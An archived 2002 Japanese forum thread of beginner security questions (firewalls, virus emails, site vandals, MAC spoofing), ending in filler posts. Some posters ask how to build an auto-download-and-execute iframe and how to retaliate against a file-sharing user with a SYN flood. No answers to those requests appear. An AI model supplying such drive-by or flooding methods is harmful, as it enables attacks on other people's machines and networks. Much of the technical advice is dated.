初心者版の「本当に答えが知りたい質問はこちらへ!」で解決 できなかった質問です。↓ みなさん、とっても困っています。 HPに荒らしが来ます。IPドメインSEARCHで検索してその住所をヤフーで 検索したところ、とある掲示板でハッキングの名前?として全く同じIP が上がっていました。ということは自分はハッキングされているのですか? プロバイダーのHPスペースを使っているので心配ですどうしたらいいか 教えて下さい。お願いします。 その検索結果ではまだHTML化されていないようですが2ちゃんねるの 「ウザイ奴のIP及び情報はここに。Part2」にものっていたものみたいです。
>>918 ファイヤーウォールソフト入れてません?
私はZone Alarmってソフトを入れてましたが、
それをを終了するとできました
>>923 何がいいたいのかわからんので回答できる奴がいるはずがない。
しかし、ここはセキュ板だ超推理をもって回答しよう。
HP閉じろ。
WinXPのディスク買ってきて F4キーを起動時に押して、パーティション切ったら NTFSのファイルフォーマット。WinXPを入れる それで その程度の奴なら十分だよ。 ホームページやられてもパソに入られることはまずない そりゃトロイしこみゃ話は別だけど…変なの実行してないよね?
927 :
名無しさん@お腹いっぱい。 :02/04/02 01:31
無線ルーターを使っていて、PCにはウィルスバスターをいれてます。 でも、今にいたる3〜4ヶ月、ルーターのログにもウィルバスターの ファイアーウォールのログにも不正アクセスの形跡はありません。 この板を見てると、皆さんは頻繁に不正アクセスを受けてるようなんですが、 こんなに長期にわたって不正アクセスされないなんてことはあるんでしょうか? それとも、私のルーター、およびセキュリティーソフトの設定が間違ってる?
>925 そうか、そうだよな。 逝ってくる。
929 :
名無しさん@お腹いっぱい。 :02/04/02 02:25
!
931 :
名無しさん@お腹いっぱい。 :02/04/02 08:38
>>924 ダメでした・・・あうあう。。
NIS入れてますけど、NAVだと発見出来なかったのが
トレンドマイクロのオンラインスキャンだと発見できた、
っていう話がちょこちょこあるので是非一度やりたいと
思っているのですが。
NIS2001だし、どうせNIS2002を買わなきゃいかんかなーと
思っていたとこなのでこの際VB2002を買おうかと思います。
ifame中にファイルを指定すると、勝手にダウンロード -> 実行 とできるそうなのですが、どのように記述するのでしょうか? 脆弱性のテストに使用したいので、よろしくおねがいします。
アクセス解析で取得した荒らし厨房のIPやホストを公開するのは違法ですか?
最近パソコンを買ったら名前は忘れたけどウイルスチェックソフトが入っていました。 このソフト常駐しているようなのですが、ウイルスチェックソフトは 常駐させないと意味ないんですか? たまに起動して検査するとかでもいいんでしょうか。 常駐しているとシステムリソースを食いそうで嫌なんですが。
>>930 「Closed!」が一つで、後は全部「Stealth!」でした。
もう一つのテストも大丈夫だったようです。
問題は無いみたいです。
>>933 違法じゃないけど公開してもあまり意味ないよ
>>934 意味ないことはないけど、感染する割り合いは高くなるだろうね
937 :
(ー_ー;) :02/04/02 15:31
会社のPCにアクセスしてくるやつのMACアドレス特定できたのですが これで本当に100%そいつだといいきれつのでしょうか? ネットの技術にあまり詳しくないのでもしかしたらMACアドレスというのが詐称できるのでは ないかと思っております。 詳しい方おられましたらMACアドレスが詐称できるのかどうか教えていただけると幸いです。
939 :
(ー_ー;) :02/04/02 16:22
>>938 じゃあ今回のことで特定できたとはいいきれないわけですね
941 :
名無しさん@お腹いっぱい。 :02/04/02 20:02
チャットの裏入室はどうやるんですか?
>941 初級ネット板に逝(以下略 そもそもセキュリティと何の関係があるのかと小一時間(以下略
すんません、大変馬鹿馬鹿しい質問なんですが。 先日Windows板Win2000スレに書いたら、無視されたんで自己終了してきました。 Win2000proが入ってる古いパソがありまして。 なんだかドライバが合わなくて、Windows Updateから新しいドライバ落としてきて解決していたんですが。 そいつに回復コンソール入れてみました。 とたんに数々のドライバが死にまして。まともに稼動しません。 オーディオ関連、ディスプレイ、その他(鬱 漏れだけなんでしょうか、そゆ体験。
勝手に使用されてしまうsmtpサーバ cop.dip.jp DOCOMOに来たSPAMのFROMに書いてあったよ
>>943 なんで無視されたのかなんとなくわかる。
>>945 漏れも我ながら、何となくわかる。
リースじゃないから、当分使わなければならんので、鬱。
不正アクセスって一般人もやられるものなの? そゆことする人はなんのメリットがあってやつんでしょ?
>>947 やられないと思うよ
メリットはたくさん 情報を盗めるし
ゾーンアラームで警告がでたらとりあえずNOでいいんですか?
202.225.94.247 10分間に100回近くきたのですがどうすればいいのでしょうか。
951 :
名無しさん@お腹いっぱい。 :02/04/03 00:32
hello,○○(俺のメアドの@より先の部分),meeting,notic っていう件名のメールがきたんですけどウイルスですかねぇ
MX厨が6699叩いてうざいからsyn floodingでも喰らわしてやろうかと思うけど、 もっと効果的なのある?
掲示板の荒らし方や侵入の方法、メールボムの送り方等、 攻撃方法の質問はご遠慮下さい。
954 :
名無しさん@お腹いっぱい。 :02/04/03 00:38
プロクシの設定のをしようと思ったんですが アドレスとポートはどうやって手に入れるんですか??
955 :
名無しさん@お腹いっぱい。 :02/04/03 00:39
送信者:Postmaster。件名:Undeliverable--"height" というメールが届きました。 内容は The following mail can't be sent to **********(伏字) From: **********(伏字) To: **********(伏字) Subject: height The file is the original mail で、↓の添付ファイルも二つセットです。 Wz.exe Movies〔1〕.jpg これって何でしょう? *Fromが自分のアカウントになってるんですが、 送信先のアカウントは知らないし、もちろん送った心当たりは全く無し。 当然添付ファイルは開いてないけど、これって何?ウィルス? 気になって夜も眠れません・・・・・
>>953 スマン
MX厨が俺の帯域勝手に使いやがるから防御しようと思うが、syn floodingより効果的なのある?
957 :
名無しさん@お腹いっぱい。 :02/04/03 00:49
0ぱっち
件名が「your password」というファイルつきのメールが来たんですが、 やっぱりウィルスですか? とりあえず削除したんですが。
959 :
名無しさん@お腹いっぱい。 :02/04/03 01:38
たぶん
960 :
名無しさん@お腹いっぱい。 :02/04/03 09:34
961 :
名無しさん@お腹いっぱい。 :02/04/03 09:42
EJOCKHEJ.EXEってファイルが添付された 差出人不明、件名・本文無しのメールが来たんですが、 やっぱウイルスですか?
965 :
名無しさん@お腹いっぱい。 :02/04/05 00:01
スレ一覧の下のほうの 542: 【$ANCOR:22】 (22)ってなんだろね。
くだらねぇ質問はここに書き込め Ver2.15
age
z
a
くだらねぇ質問はここに書き込め Ver2.15
*
~
.
くだらねぇ質問はここに書き込め Ver2.15
@
!
すでにここは 乂1000獲り合戦場乂 です。 \∧_ヘ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ,,、,、,,, / \〇ノゝ??< 1000獲り合戦、とっととはじめるモナッ!! ,,、,、,,, /三??´∀`)/ \____________ ,,、,、,,, /三/| ゚U゚|\ ,,、,、,,, ,,、,、,,, ,,、,、,,, U (:::::::::::) ,,、,、,,, \オーーーーーーーッ!!/ //三/|三|\ ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧ ?怐@ ?怐@ ( ) ( ) ( ) ) ,,、,、,,, ,,、,、,,, ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧ ,,、,、,,, ( ) ( ) ( ) ( )
くだらねぇ質問はここに書き込め Ver2.15
|
くだらねぇ質問はここに書き込め Ver2.15
一 六甲おろしに颯爽と 蒼天翔ける日輪の 青春の覇気麗しく 輝く我が名ぞ阪神タイガース オウ、オウ、オウオウ 阪神タイガース フレ、フレフレフレ 二 闘志溌剌起つや今 熱血既に敵を衝く 獣王の意気高らかに 無敵の我等ぞ阪神タイガース オウ、オウ、オウオウ 阪神タイガース フレ、フレフレフレ 三 剛腕強打幾千たび 鍛えてここに甲子園 勝利に燃ゆる栄冠は 輝く我等ぞ阪神タイガース オウ、オウ、オウオウ 阪神タイガース フレ、フレフレフレ
sage
992 :
名無しさん@お腹いっぱい。 :02/04/07 03:24
1000
993 :
名無しさん@お腹いっぱい。 :02/04/07 03:25
1000
994 :
名無しさん@お腹いっぱい。 :02/04/07 03:25
1000
995 :
名無しさん@お腹いっぱい。 :02/04/07 03:25
1000
996 :
名無しさん@お腹いっぱい。 :02/04/07 03:25
1000
997 :
名無しさん@お腹いっぱい。 :02/04/07 03:26
1000
998 :
名無しさん@お腹いっぱい。 :02/04/07 03:26
1000
999 :
名無しさん@お腹いっぱい。 :02/04/07 03:26
1000
1000 :
名無しさん@お腹いっぱい。 :02/04/07 03:27
1000
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。